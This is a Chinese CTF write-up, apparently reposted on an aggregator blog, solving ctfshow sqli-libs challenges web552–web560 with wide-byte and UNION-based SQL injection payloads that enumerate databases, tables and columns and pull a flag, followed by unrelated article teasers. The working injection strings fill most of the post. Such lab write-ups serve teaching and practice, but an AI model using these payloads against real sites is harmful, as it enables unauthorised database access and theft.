ctfshow web入门 sqli-libs web552--web560

news2024/12/23 13:44:46

web552

宽字节注入
嗯原理我就不讲了,还是有点复杂后面有时间讲讲
总而言之就是用汉字把\的转义作用抵消了然后正常注入即可
在这里插入图片描述
在这里插入图片描述

?id=-1包' union select 1,2,3--+

?id=-1包'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77),3--+

?id=-1包'union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773),3--+

?id=-1包'union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web553

与上题同

web554

在这里插入图片描述
在这里插入图片描述

passwd=admin&uname=爱' union select 1,2--+

passwd=admin&uname=爱' union select 1,(select group_concat(schema_name) from information_schema.schemata)--+
Your Password:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test

passwd=admin&uname=爱' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77)--+
Your Password:flags

passwd=admin&uname=爱' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773)--+
Your Password:id,flag4s

passwd=admin&uname=爱' union select 1,(select group_concat(flag4s) from ctfshow.flags)--+

web555

在这里插入图片描述
警告是说第一个参数应该是一个数而不是布尔

?id=1.1 union select 1,2,3--+

?id=1.1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77),3--+

?id=1.1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773),3--+

?id=1.1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

后面发现-1也可以
在这里插入图片描述
在这里插入图片描述

web556

又变成宽字节了

?id=-1爱' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77),3--+

?id=-1爱' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773),3--+

?id=-1爱' union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web557

在这里插入图片描述
在这里插入图片描述
这东西和前面的一模一样感觉在凑数

passwd=admin&uname=爱' union select 1,2--+

passwd=admin&uname=爱' union select 1,(select group_concat(schema_name) from information_schema.schemata)--+
Your Password:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test

passwd=admin&uname=爱' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77)--+
Your Password:flags

passwd=admin&uname=爱' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616773)--+
Your Password:id,flag4s

passwd=admin&uname=爱' union select 1,(select group_concat(flag4s) from ctfshow.flags)--+

web558

简单的联合注入

?id=-1' union select 1,2,3--+

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+

?id=-1' union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web559

Please input the ID as parameter with numeric value
要一个数字参数
?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+

?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web560

测出闭合
?id=-1') or 1--+
?id=-1') or 0--+
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+

?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3--+

?id=-1') union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1883955.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ChatGPT-4o医学应用、论文撰写、数据分析与可视化、机器学习建模、病例自动化处理、病情分析与诊断支持

2022年11月30日,可能将成为一个改变人类历史的日子——美国人工智能开发机构OpenAI推出了聊天机器人ChatGPT-3.5,将人工智能的发展推向了一个新的高度。2023年11月7日,OpenAI首届开发者大会被称为“科技界的春晚”,吸引了全球广大…

如何使用pytest组织自动化测试用例结构?

如何组织自动化测试工程的目录结构?这篇文章介绍了我是如何组织整个自动化工程目录结构的,本篇介绍下我是如何利用pytest框架组织一个测试用例文件的。 用例文件组织原则 整个testsuite目录下整体上按照特性模块划分目录,每个目录下可以只包…

Python容器 之 列表--下标和切片

列表的切片 得到是 新的列表字符串的切片 得到是 新的字符串 如果下标 不存在会报错 list1 [1, 3.14, "hello", False] print(list1)# 获取 列表中 第一个数据 print(list1[0]) # 1# 获取列表中的最后一个数据 print(list1[-1]) # [False]# 获取中间两个数 即 3.1…

币界网快讯,比特币7月份看牛预测

今日数字货币市场全面开启反弹,比特币从 60,000 美元大关飙升至 63,700 美元,预示着 7 月牛市的到来。在此之前,上周曾短暂跌破 60,000 美元,但受到 BTC 现货 ETF 流入的 7,300 万美元的推动——这是两周以来最大的流入。 BTC价格…

Linux下SUID提权学习 - 从原理到使用

目录 1. 文件权限介绍1.1 suid权限1.2 sgid权限1.3 sticky权限 2. SUID权限3. 设置SUID权限4. SUID提权原理5. SUID提权步骤6. 常用指令的提权方法6.1 nmap6.2 find6.3 vim6.4 bash6.5 less6.6 more6.7 其他命令的提权方法 1. 文件权限介绍 linux的文件有普通权限和特殊权限&a…

Redis基础教程(六):redis 哈希(Hash)

💝💝💝首先,欢迎各位来到我的博客,很高兴能够在这里和您见面!希望您在这里不仅可以有所收获,同时也能感受到一份轻松欢乐的氛围,祝你生活愉快! 💝&#x1f49…

【火猫】cs2 donk登顶2024年上半年ADR榜

1、HLTV发布数据统计,donk以55张地图中96.8的ADR成功登顶上半年ADR榜单第一。紧随其后的是法国巨星ZywOo,以68图89.2的ADR排名第二。G2当家狙击手m0NESY以73图85的ADR排名第三。 2、白俄罗斯爆料人harumi透露:“Falcons战队向BOROS支付了6个月…

每日复盘-20240701

今日关注: 20240701 六日涨幅最大: ------1--------301182--------- 凯旺科技 五日涨幅最大: ------1--------300977--------- 深圳瑞捷 四日涨幅最大: ------1--------300977--------- 深圳瑞捷 三日涨幅最大: ------1--------300461--------- 田中精机 二日涨幅最…

科普:电脑硬件挑选

目录 一cpu 二主板 三内存 四硬盘 五显卡,散热,电源,机箱 六个人配置 一cpu 品牌:intel AMD 型号:I3,I5,I7 R7等 代数:换新不换旧 cpu后缀:k(可超频)f&#xf…

PHP电商系统开发指南最佳实践

电子商务系统开发的最佳实践包括:数据库设计:选择适合关系型数据库,优化数据结构,考虑表分区;安全:加密数据,防止 sql 注入,处理会话管理;用户界面:遵循 ux 原…

WhaleStudio 2.6正式发布,WhaleTunnel同步性能与连接器数量再创新高!

在这个数据驱动的大模型时代,数据集成的作用和意义愈发重要。数据不仅仅是信息的载体,更是推动企业决策和创新的关键因素。作为全球最流行的批流一体数据集成工具,WhaleTunnel随着WhaleStudio 2.6版本正式发布,带来了多项功能增强…

App测试技术(纯理论)

之前我们也学习过一些普通用例的设计, 如功能, 性能, 安全性, 兼容性, 易用性, 界面的测试用例设计, 之前我们讲的基本都是对于Web应用而言的, 这里我们来讲一下移动端的App测试用例设计. 功能方面 安装&卸载测试 这是只属于App的一类测试, 再平常我们使用移动设备(手机…

扩展学习|风险评估和风险管理:回顾其基础上的最新进展

文献来源:[1]Aven, T. (2016). Risk assessment and risk management: Review of recent advances on their foundation. European journal of operational research, 253(1), 1-13. 文章简介:大约30-40年前,风险评估和管理被确立为一个科学领…

Linux环境安装配置nginx服务流程

Linux环境的Centos、麒麟、统信操作系统安装配置nginx服务流程操作: 1、官网下载 下载地址 或者通过命令下载 wget http://nginx.org/download/nginx-1.20.2.tar.gz 2、上传到指定的服务器并解压 tar -zxvf nginx-1.20.1.tar.gzcd nginx-1.20.1 3、编译并安装到…

CCT技术

概念介绍 多个功能核心的集成可以通过片上系统(SOC)或封装中系统(SIP)设备的开发来实现。SOC器件将核心集成到单个集成电路中。SIP集成是将多个集成电路组合到单个封装中。核心数量 的增加可能导致必要的测试人员资源和/或测试时间的增加。这直接影响了与测试这些设备相关的…

【TB作品】打地鼠游戏,ATMEGA16单片机,Proteus仿真 打地鼠游戏

11个按键LCD1602显示器9个灯蜂鸣器打地鼠小游戏就是九个灯泡,对应九个按键,灯泡有红黄蓝,每间隔一会儿就会亮一个灯,代表地鼠冒出来,按一下按键让灯泡灭掉代表打地鼠,红的三分,黄的两分&#xf…

Java案例抢红包

目录 一:题目要求: 二:思路分析:(遇见问题先想出完整的思路逻辑再去动手事半功倍) 三:具体代码: 一:题目要求: 二:思路分析:&#x…

[无广告!纯干货]免费用CodeFlying自动化生成一个专属的AI机器人

前言: 真心话,花3分钟看文章,再花5分钟体验,你会回来给我点赞的。 随着AIGC(人工智能生成内容)行业的迅猛发展,人工智能正在以前所未有的速度和方式改变我们的生活。 它不仅在娱乐、教育、医疗…

Nomad Web 1.0.12还能这样

大家好,才是真的好。 前几天讲代码和开发,忽略了大家的真实感受,那就是不爱开。我也记起来我们很久没有讲Notes/Domino产品的更新,因为除了补丁程序外,确实没多少更新。 不过就在前两天,有一项产品得到了…

惠海100V 15A HC070N10L TO-252封装 N沟道MOS管 打火机/BMS电源板应用

MOS管的工作原理是基于在P型半导体与N型半导体之间形成的PN结,通过改变栅极电压来调整沟道内载流子的数量,从而改变沟道电阻和源极与漏极之间的电流大小。由于MOS管具有输入电阻高、噪声小、功耗低等优点,它们在大规模和超大规模集成电路中得…